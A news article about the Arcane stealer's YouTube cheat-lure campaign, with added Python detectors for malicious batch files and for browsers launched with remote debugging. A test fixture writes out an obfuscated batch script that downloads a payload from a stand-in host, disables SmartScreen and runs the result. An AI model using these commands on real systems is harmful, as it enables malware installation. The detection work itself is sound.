
Original distribution scheme | Image: Kaspersky
A new and sophisticated stealer malware named “Arcane” is targeting gamers by distributing itself through YouTube videos promoting game cheats, according to a recent report by Kaspersky Labs. The malware harvests a broad range of user data, posing a serious threat to unsuspecting victims.
According to Kaspersky’s report, the distribution campaign predates Arcane’s discovery, but the malware itself appears to be a successor to another stealer known as VGS. As Kaspersky noted, “The campaign in which we discovered the new stealer was already active before Arcane appeared.”
The infection chain typically begins with a YouTube video offering a fake game cheat. These videos include links to password-protected archives that, once extracted, execute a malicious batch file (start.bat). The batch script is heavily obfuscated and is designed to:
- Download a secondary password-protected archive using PowerShell
- Disable Windows SmartScreen protection to evade detection
- Extract and execute malware binaries from the archive
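The three steps above leave recognisable traces in the batch file itself, and a defender can triage a suspicious start.bat before it is ever run. The following is an added example written for this article, not code from Kaspersky or from the malware: a small Python scanner that resolves simple `set name=value` fragment obfuscation, then looks for a PowerShell launch, a download cmdlet, a change to the SmartScreenEnabled/EnableSmartScreen registry values, and a password-protected archive extraction. The sample scripts are constructed for the demonstration; the indicator patterns and the triage threshold are the author's own assumptions, not a published rule set.

```python
import re

# Constructed sample in the style of the start.bat described above (not the real
# script): variable-fragment obfuscation, a PowerShell download, a SmartScreen
# registry change, and extraction of a password-protected archive.
SAMPLE_BAT = r"""@echo off
set a=pow
set b=ersh
set c=ell
set d=%COMSPEC:~-7,3%
%a%%b%%c% -w hidden -c "Invoke-WebRequest http://example.invalid/p.zip -OutFile %TEMP%\p.zip"
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
"%ProgramFiles%\7-Zip\7z.exe" x -pSecret %TEMP%\p.zip -o%TEMP%\p
start "" %TEMP%\p\run.exe
"""

# Constructed benign build script, used to check for false positives.
BENIGN_BAT = r"""@echo off
echo Building project...
mkdir build
copy /Y src\main.c build\main.c
"""

# Indicator patterns (assumed, not an official rule set); each is applied per line.
INDICATORS = {
    "powershell_launch": re.compile(r"\b(powershell(\.exe)?|pwsh)\b", re.I),
    "download_cmdlet": re.compile(
        r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bbitsadmin\b",
        re.I),
    "smartscreen_tamper": re.compile(r"SmartScreenEnabled|EnableSmartScreen", re.I),
    "protected_archive_extract": re.compile(r"\b(7z|7za|unrar|winrar)(\.exe)?\b.*\s-p\S+", re.I),
    "var_concat_obfuscation": re.compile(r"(?:%\w+%){2,}"),            # %a%%b%%c%
    "substring_obfuscation": re.compile(r"%\w+:~-?\d+(?:,-?\d+)?%"),   # %VAR:~n,m%
}

SET_RE = re.compile(r'^\s*set\s+"?([A-Za-z_]\w*)=([^"\r\n]*)"?\s*$', re.I | re.M)
VAR_RE = re.compile(r"%([A-Za-z_]\w*)%")


def expand_variables(text, rounds=5):
    """Resolve %name% references defined by plain `set name=value` lines so that a
    command assembled from fragments (pow+ersh+ell) becomes visible to the scan."""
    env = {m.group(1).lower(): m.group(2) for m in SET_RE.finditer(text)}
    for _ in range(rounds):
        new = VAR_RE.sub(lambda m: env.get(m.group(1).lower(), m.group(0)), text)
        if new == text:
            break
        text = new
    return text


def scan_batch(text):
    """Return {indicator: [1-based line numbers]} for every indicator that fires
    on either the raw script or its variable-expanded form."""
    raw_lines = text.splitlines()
    expanded_lines = expand_variables(text).splitlines()
    hits = {}
    for name, rx in INDICATORS.items():
        lines = sorted({i + 1 for i, (raw, exp) in enumerate(zip(raw_lines, expanded_lines))
                        if rx.search(raw) or rx.search(exp)})
        if lines:
            hits[name] = lines
    return hits


def is_suspicious(hits):
    """Triage rule (assumed): SmartScreen tampering alone is enough; otherwise
    require three independent indicators so a lone curl in a build script stays quiet."""
    return "smartscreen_tamper" in hits or len(hits) >= 3


if __name__ == "__main__":
    for label, script in (("sample", SAMPLE_BAT), ("benign", BENIGN_BAT)):
        hits = scan_batch(script)
        print(label, "suspicious" if is_suspicious(hits) else "clean", hits)
```

Scanning both the raw and the expanded text matters: the obfuscation markers only exist in the raw form, while the PowerShell launch only becomes visible after the fragments are joined. The same approach extends to any archive that ships a .bat or .cmd next to a "cheat" binary.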
Once executed, Arcane immediately begins harvesting sensitive information. The stealer is capable of extracting:
- Credentials and tokens from Chromium and Gecko-based browsers
- Configuration files from major VPN clients, including OpenVPN, NordVPN, and Surfshark
- Gaming platform credentials from Steam, Riot, Epic Games, Ubisoft Connect, and Battle.net
- Messaging app data from Telegram, Discord, ICQ, and Signal
- Crypto wallet details from Exodus, Electrum, Guarda, and Coinomi
Kaspersky researchers stated, “In addition to logins, passwords, credit card data, tokens and other credentials, Arcane steals configuration files, settings, and account information from various applications.”
Arcane employs multiple methods to extract credentials, including:
- Abusing Windows Data Protection API (DPAPI) to decrypt saved browser credentials
- Utilizing the Xaitax utility to crack encryption keys stored in browser databases
- Injecting a remote debugging session into Chromium-based browsers to extract session cookies for popular services like Gmail, YouTube, Twitter, and Steam
By hijacking active browser sessions, the stealer can access password-protected accounts without needing login credentials, making it an extremely potent threat.
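The remote-debugging technique is worth singling out for detection because the cookies are read through the browser itself rather than from its encrypted cookie database, so file-access and DPAPI-based alerts never fire. What does show up is the browser being started with Chromium's remote-debugging switches. The following is an added example written for this article, not Kaspersky's code or a description of Arcane's implementation: a Python triage routine over Sysmon-style process-creation events that flags a Chromium-based browser launched with `--remote-debugging-port` or `--remote-debugging-pipe`, and raises the severity when it is also headless, pointed at the real "User Data" profile, or spawned by an unexpected parent. The events, the parent allow-list and the scoring thresholds are all constructed assumptions for the demonstration.

```python
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 1001, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"pid": 1002, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Users\victim\AppData\Local\Temp\p\run.exe",
     "command_line": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless '
                     r'--remote-debugging-port=9222 '
                     r'--user-data-dir="C:\Users\victim\AppData\Local\Google\Chrome\User Data"'},
    {"pid": 1003, "image": r"C:\Program Files\Microsoft\Edge\Application\msedge.exe",
     "parent_image": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "command_line": r'"C:\Program Files\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 '
                     r'--user-data-dir="C:\Users\dev\.vscode\edge-profile"'},
    {"pid": 1004, "image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"notepad.exe --remote-debugging-port=9222"},
]

CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
# Assumed allow-list of parents from which a debug-enabled browser is expected:
# the browser relaunching itself, the shell, and common developer tooling.
EXPECTED_PARENTS = CHROMIUM_BROWSERS | {"explorer.exe", "code.exe", "devenv.exe", "node.exe"}

REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-(port|pipe)\b", re.I)
HEADLESS_RE = re.compile(r"--headless\b", re.I)
USER_DATA_DIR_RE = re.compile(r'--user-data-dir=(?:"([^"]*)"|(\S+))', re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return None for uninteresting events, otherwise a finding with severity and reasons."""
    if basename(event["image"]) not in CHROMIUM_BROWSERS:
        return None
    cmd = event["command_line"]
    if not REMOTE_DEBUG_RE.search(cmd):
        return None
    reasons = ["remote debugging enabled"]
    score = 1
    if HEADLESS_RE.search(cmd):
        reasons.append("headless (no visible window)")
        score += 1
    m = USER_DATA_DIR_RE.search(cmd)
    if m and "user data" in (m.group(1) or m.group(2)).lower():
        reasons.append("pointed at the real profile directory")
        score += 1
    parent = basename(event["parent_image"])
    if parent not in EXPECTED_PARENTS:
        reasons.append(f"unexpected parent {parent}")
        score += 1
    severity = "high" if score >= 3 else "medium" if score == 2 else "low"
    return {"pid": event["pid"], "severity": severity, "reasons": reasons}


def triage(events):
    """Apply evaluate() to every event and keep only the findings."""
    return [r for r in (evaluate(e) for e in events) if r is not None]


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["pid"], finding["severity"], "; ".join(finding["reasons"]))
```

The developer case (pid 1003) is still reported, but at low severity, because web developers legitimately launch debug-enabled browsers from their editor against a throwaway profile; a stealer needs the real profile directory, which is what lifts the second event to high.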
In early 2025, Kaspersky observed a shift in distribution tactics with the emergence of ArcanaLoader, a fake software installer that serves as an initial infection vector for Arcane Stealer. Attackers now promote ArcanaLoader through YouTube, luring users into downloading what appears to be cracked software or cheat tools.
Researchers noted that ArcanaLoader even included an invite link to a Discord server, where users were encouraged to download updates and engage with other “cheat seekers.” However, this was just another layer of social engineering designed to spread the malware.
While the Arcane campaign appears to have global reach, Kaspersky’s telemetry suggests a strong focus on Russian-speaking users. The majority of infected victims have been observed in Russia, Belarus, and Kazakhstan, aligning with the language of the YouTube videos and Discord discussions promoting the malware.